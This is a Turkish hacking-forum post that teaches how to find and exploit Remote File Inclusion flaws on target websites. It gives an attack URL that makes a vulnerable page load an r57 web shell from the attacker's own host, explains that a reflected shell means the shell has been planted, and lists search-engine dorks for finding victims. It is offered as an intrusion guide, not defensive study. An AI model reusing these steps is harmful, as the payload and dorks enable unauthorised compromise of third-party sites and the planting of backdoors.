Hedef site üzerinde elle rfi açık bulmak (1 Viewer)

1-) Hedef Site Üzerinde Manuel(Elle) Olarak RFI Açığı Taramak. Şimdi size tekrar hedef sitemiz olan www.xxx.com üzerinden manuel açık tarayamayı anlatacağım. Sitemizde bir id...

1-) Hedef Site Üzerinde Manuel(Elle) Olarak RFI Açığı Taramak.

Şimdi size tekrar hedef sitemiz olan www.xxx.com üzerinden manuel açık tarayamayı anlatacağım.

Sitemizde bir id değeri ararız.Buldugumuz id değerinde RFI açığı tararız.Nasılmı?

www.xxx.com/sayfa.php?id=1

Gerekli olan bir şey daha belirteyim.Kendi hostunuza atılmış bir txt uzantılı shell..Oda www.sitemiz.com/r57shell.txt?

Şimdi hedef sitemizdeki id değerinin sonundaki rakam/harf/karakter herneyse siliyoruz ve kendi sitemizdeki txt uzantılı shell adresini yazıyoruz.

www.xxx.com/sayfa.php?id=http://sitemiz.com/r57shell.txt?

ekrana r57shellimiz yansır ise bir RFI Açığı bulmuşsunuz demektir.Bir Screnn ile anlatayım bunu; (Shell yansıması)

Bu resim otomatik olarak küçültülmüştür. Resmin tam görünümü için tıklayın. Orjinal resim boyutu 993x838.

Evet.Bu şekilde bir Shell yansıması olur ise hedef siteye shell sokulmuş demektir.

RFI Açığının Bir Dorku Varmıdır?

RFI Açığının belirli bir dorku yoktur.PHP ve ASP vs vs sayfalarda olabilir.Şimdi ben buraya binlerce dork yazabilirim ama zamanımız kısıtlı bu yüzden bir kaç örnek dork vereyim.

inurl:"page?id="

inurl:"open?id="

inurl:"go?id="
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl

Users who are viewing this thread

133,160Konular
3,282,458Mesajlar
319,363Kullanıcılar
Berk1959Son Üye
Üst Alt